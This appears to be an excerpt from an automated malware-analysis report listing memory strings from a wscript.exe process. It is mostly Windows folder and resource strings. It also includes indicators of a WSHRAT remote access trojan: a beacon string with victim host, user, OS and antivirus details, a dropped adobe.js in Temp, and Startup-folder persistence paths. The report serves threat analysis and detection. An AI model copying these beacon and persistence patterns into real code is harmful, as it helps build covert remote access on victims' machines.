                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21798memstr_73bd2d10-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-184memstr_7fb9cfc7-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktop@memstr_37fb69a7-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .desktopmemstr_9a81bb85-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ @!@"@#@$@%@&@'@(@)@*@+@,@-@.@/@0@1@2@3@4@5@6@7@8@9@:@;@<@=@>@?@@@a@b@c@d@e@f@g@h@tmemstr_8554a43b-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 303h3d3memstr_e71ae684-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 34,4p4t4memstr_5917ff3b-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5(5p5x5memstr_e54cf1f7-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6,6p6p6memstr_68d42808-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7,7p7t7memstr_f7708a6c-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8l8|8memstr_81c34f65-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9<9`9memstr_a9732ecf-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :0:t:|:memstr_b1052c32-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;<;x;t;memstr_2e13512a-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;< <<<d<cmemstr_d58c0c6d-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: musicmemstr_b46b5599-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: music<memstr_7b859837-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .musicmemstr_9069e2cb-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `m>@p'memstr_5ea94929-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wv8 pmemstr_c94793e7-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21769memstr_c9839074-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-183memstr_9aeb2cea-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: videosmemstr_6fd2608c-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: videos>memstr_dcba7809-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .videosmemstr_868a8238-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12688memstr_bd86ca0b-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\downloads\desktop.inimemstr_fac96c9e-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21770memstr_103c7fcf-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1040memstr_0ff7cda0-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-115memstr_417bf1f6-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}memstr_d78bb776-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (wf(wf@jmemstr_afa9ea89-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21779\memstr_48605a94-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-108vmemstr_bc0df140-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12690pmemstr_83906a2a-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-189jmemstr_6bf2dd9c-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21787dmemstr_04219558-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21786~memstr_16a3b261-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-117xmemstr_0fd9a8ed-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21790rmemstr_36448816-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12689lmemstr_62a920e1-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21796fmemstr_531f8e33-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21798`memstr_433e1027-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\favorites\desktop.ini9d}memstr_0823105c-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21787memstr_088862c4-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21782memstr_a3fae154-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21791memstr_38e111f9-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-113<memstr_835e3f62-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dlll6memstr_38077846-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1840memstr_e5154f64-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-112*memstr_c95fd866-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21797$memstr_52896fb7-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dlllmemstr_1251e128-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21769memstr_12fd815a-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{20d04fe0-3aea-1069-a2d8-08002b30309d}memstr_cd3682f8-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\desktop.inimemstr_7080a596-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-112memstr_8a5f680c-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\fonts\desktop.inimemstr_fcb1de64-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-183memstr_8fddd0af-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\documents\desktop.inimemstr_309e4a43-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\`1memstr_e81943d6-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progra~3memstr_b327e7e0-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progra~3hmemstr_efb49f23-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zit.gmemstr_70d0a037-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programdatamemstr_4109e854-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: micros~1memstr_97539244-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: micros~1dmemstr_ad9ccf89-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zpt.hmemstr_7283f296-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowsmemstr_11472f4d-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows@memstr_768ddff9-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startm~1memstr_023a0b78-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startm~1nmemstr_8bc509c4-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start menu@shell32.dll,-21786memstr_d32c563c-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21770memstr_56c47151-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-112memstr_0eb969ab-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-235memstr_3230f77d-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshrat|b81a4609|user-pc|user|microsoft windows 10 pro|plus|windows defender .|false - 15/4/2025|javascriptmemstr_98d81c5d-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\v1gzctmemstr_ebf9b771-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zlt.3memstr_ff79cb6a-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fontsmemstr_2e16dabe-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fonts<memstr_dff0030d-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lfontsmemstr_023a7607-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \rr:\users\user\appdata\local\temp\adobe.jsindows\start menu\programs\startuptop.inihmemstr_9d1d27fa-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 693405117-2476756634-100memstr_8bf3dd70-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21786memstr_81055f27-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{088e3905-0323-4b02-9826-5d99428e115f}(memstr_219231e0-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{a8cdff1c-4878-43be-b5fd-f8091c1c60d0}memstr_180f60c9-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{24ad3ad4-a569-4530-98e1-ab02f9417aa8}memstr_070c9e8c-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startupmemstr_3b9f2f41-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}tmemstr_3ddc8eac-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21787memstr_752a1871-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bc:\users\user\appdata\local\temprosoft\windows\start menu\programs\startupmemstr_2988ce7b-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}memstr_4b6b0b1f-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentsmemstr_fb5d381b-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentsdmemstr_9ce71190-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .documentsmemstr_0fb05c83-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21779memstr_90fa509e-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12688memstr_2305e772-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-113memstr_9cab8740-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-236memstr_163f284a-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupmemstr_5c0fb67c-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favoritesmemstr_fbd694bb-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programsmemstr_ff7a79ab-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onedrivememstr_a655b54f-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: printhood=memstr_314fa740-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documents;memstr_aac83bf5-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \lder5memstr_046fff16-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,xrs1memstr_f9509005-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: folder/memstr_3e7d3458-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,xfolder-memstr_48032729-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downloads+memstr_41001e31-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fonts)memstr_e6784564-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \lder'memstr_b7d38d33-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pictures#memstr_64aea4a8-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: folder!memstr_f78e87a5-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: templatesmemstr_eca07533-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupmemstr_66c1804b-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,xfoldermemstr_4a627817-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: personalmemstr_760a0706-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jsoldermemstr_a7dc87cc-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sendtomemstr_5ecfef9b-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start menumemstr_1ec926d7-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nethoodmemstr_d7ee5a05-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: foldermemstr_2b19a881-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: recentmemstr_a679896d-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesmemstr_4e97b279-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesbmemstr_23ed45b2-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .picturesmemstr_fd29badd-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21791memstr_e3de57c9-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12690memstr_6b1a2449-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-189memstr_684d3ff6-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-238memstr_3fe97e9e-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mycomputerfolderhmemstr_7b3fb7b5-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common programsgmemstr_c295070d-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local downloadsbmemstr_778fd297-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local videosmemstr_b2915066-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local picturesmemstr_17c25866-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\fontsmemstr_a77e0e13-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell file system folderamemstr_57b50736-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell file system foldermemstr_b69a88cf-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user1796memstr_a6f0ca26-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !("h"memstr_2a700622-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c\users\usertamemstr_fcb5a9ac-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (!d!memstr_01a76017-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrivememstr_c823c025-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\recentmemstr_74704a52-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\templatesmemstr_a072ad40-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sersesmemstr_cbee1684-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c\users\usernsmemstr_d6779ca1-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\sendtomemstr_d0d16c9b-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e,ede\ememstr_c0f50dea-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e f8b\f?memstr_95e3c647-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]/qnnmemstr_e5c4236b-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downloadsmemstr_1f3502ec-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downloadsdmemstr_4a399530-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .downloadsmemstr_93a47152-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onedrivebmemstr_a034add8-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .onedrivememstr_8cd86cd7-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "false - 15/4/2025tringsop.inimemstr_b9b94f84-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swbemsecuritysetest2memstr_e06c501d-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %@%p%memstr_284403c9-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\videos\desktop.inilmemstr_de698e37-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\printer shortcutsbmemstr_974858f8-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrive\desktop.inikmemstr_a2d9cba3-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }d"pnmemstr_ebafa85d-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\downloads9memstr_41142759-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming2memstr_98548ce4-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\network shortcuts%memstr_568a3e4f-e
